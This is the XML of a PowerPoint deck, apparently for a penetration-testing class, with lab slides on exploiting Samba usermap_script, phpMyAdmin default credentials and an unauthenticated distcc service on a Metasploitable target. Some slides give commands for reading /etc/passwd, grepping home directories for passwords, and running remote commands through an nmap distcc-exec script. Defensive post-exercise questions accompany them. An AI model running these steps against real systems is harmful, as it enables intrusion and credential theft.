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9" r:id="rId4"/>
    <p:sldId id="260" r:id="rId5"/>
    <p:sldId id="261" r:id="rId6"/>
    <p:sldId id="262" r:id="rId7"/>
    <p:sldId id="258" r:id="rId8"/>
    <p:sldId id="263" r:id="rId9"/>
    <p:sldId id="264" r:id="rId10"/>
    <p:sldId id="265" r:id="rId11"/>
    <p:sldId id="268" r:id="rId12"/>
    <p:sldId id="266" r:id="rId13"/>
    <p:sldId id="267" r:id="rId14"/>
    <p:sldId id="272" r:id="rId15"/>
    <p:sldId id="270" r:id="rId16"/>
    <p:sldId id="274" r:id="rId17"/>
    <p:sldId id="271" r:id="rId18"/>
    <p:sldId id="269" r:id="rId19"/>
    <p:sldId id="273"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85" d="100"/>
          <a:sy n="85" d="100"/>
        </p:scale>
        <p:origin x="1406"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GB"/>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CA234869-31F6-4109-9F31-2E7A23EE0098}"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1F3862-D859-426C-8914-5F5C02EBFD6F}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85733041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A234869-31F6-4109-9F31-2E7A23EE0098}"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1F3862-D859-426C-8914-5F5C02EBFD6F}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34542983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A234869-31F6-4109-9F31-2E7A23EE0098}"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1F3862-D859-426C-8914-5F5C02EBFD6F}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36170950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CA234869-31F6-4109-9F31-2E7A23EE0098}"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1F3862-D859-426C-8914-5F5C02EBFD6F}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82792517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GB"/>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CA234869-31F6-4109-9F31-2E7A23EE0098}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>12-10-2023</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901F3862-D859-426C-8914-5F5C02EBFD6F}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38088151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CA234869-31F6-4109-9F31-2E7A23EE0098}"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1F3862-D859-426C-8914-5F5C02EBFD6F}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20200004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GB"/>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CA234869-31F6-4109-9F31-2E7A23EE0098}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>12-10-2023</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901F3862-D859-426C-8914-5F5C02EBFD6F}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1282755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CA234869-31F6-4109-9F31-2E7A23EE0098}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>12-10-2023</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901F3862-D859-426C-8914-5F5C02EBFD6F}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30358711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A234869-31F6-4109-9F31-2E7A23EE0098}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>12-10-2023</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901F3862-D859-426C-8914-5F5C02EBFD6F}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4502031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A234869-31F6-4109-9F31-2E7A23EE0098}"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1F3862-D859-426C-8914-5F5C02EBFD6F}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16553214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GB"/>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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA234869-31F6-4109-9F31-2E7A23EE0098}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>12-10-2023</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901F3862-D859-426C-8914-5F5C02EBFD6F}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303379062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GB"/>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A234869-31F6-4109-9F31-2E7A23EE0098}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>12-10-2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>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01F3862-D859-426C-8914-5F5C02EBFD6F}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1742667801"/>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E466C8-D31E-8002-AF16-CFD21F52AF8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Lab Exercise 4:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91A72463-30D5-6D38-4E18-67339990916C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="5400" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> Samba with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Usermap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> Script</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172346259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31FCF-7D3B-F3A8-9358-B5B943BD8F33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>2. Look Around: Sensitive Info Hunting:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26BBD3B4-42B1-6409-CF5A-F8A815CC6E68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>View users: cat /etc/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Check network configuration: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Look for sensitive data: grep -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>iRl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> "password" /home/ (recursive search in /home/ for files containing the word "password")</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412133779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DFC0CA-546B-5590-2296-9B0FF6A9FF7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lab 5: Discovering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PHPMyAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D9D01AB-E417-1B92-3341-AA140D63B362}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Visit http://[Metasploitable IP]/phpMyAdmin in a web browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attempting Default Credentials:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try to login with username root and a blank password or commonly known default passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Post-Exploitation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you gain access, explore the databases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider what kind of malicious operations can be done from such an interface.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19975198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6DA57-CDB6-84CD-B9C5-171213A4260E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Post-Exercise Questions:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D79FE643-E224-737E-9830-D15E5438BB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is the primary cause of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usermap_script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> vulnerability in Samba?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why is it essential for systems to regularly update third-party services such as Samba?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How can organizations monitor or detect if they've been compromised via this vulnerability?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299686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A155A2-5676-1E8F-600D-C20D41BB0FBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Lab Exercise 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>PHPMyAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> Default Credentials</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{266E32E9-302D-9C2E-399E-50F6D31840E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Post-Exercise Questions</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Why might a system administrator leave default credentials on an application like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>PHPMyAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>What are some measures organizations can take to ensure credentials are not left at their defaults?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Beyond gaining access to databases, what are other potential risks of leaving management interfaces like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>PHPMyAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> exposed to attackers?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33887251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5ADE8A-3879-6040-108A-C550BC23413B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>distcc</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{111B1826-1195-7107-882F-6DA7E6B88627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>distcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a program designed to distribute compilation of C or C++ code across multiple machines in a network, with the aim of speeding up the compilation process. It's typically used in environments where code is frequently compiled and the speed of the compilation process is crucial, like in large development environments.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, like many tools, when misconfigured, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>distcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can be vulnerable. If it's run in a "no-authentication mode", an attacker can execute arbitrary commands on the system running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>distcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180202816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42283A2-56F2-C115-5981-EED03D1AEB06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493059" y="663388"/>
            <a:ext cx="8022291" cy="5513575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Discovering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>DistCC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> to detect the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>DistCC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> service: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3000" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3000" dirty="0"/>
              <a:t> -p 3632 --script=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3000" dirty="0" err="1"/>
              <a:t>distcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3000" dirty="0"/>
              <a:t>-exec --script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3000" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3000" dirty="0"/>
              <a:t>="distcc-exec.cmd='id'" [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3000" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3000" dirty="0"/>
              <a:t> IP]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Exploiting the Vulnerability:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
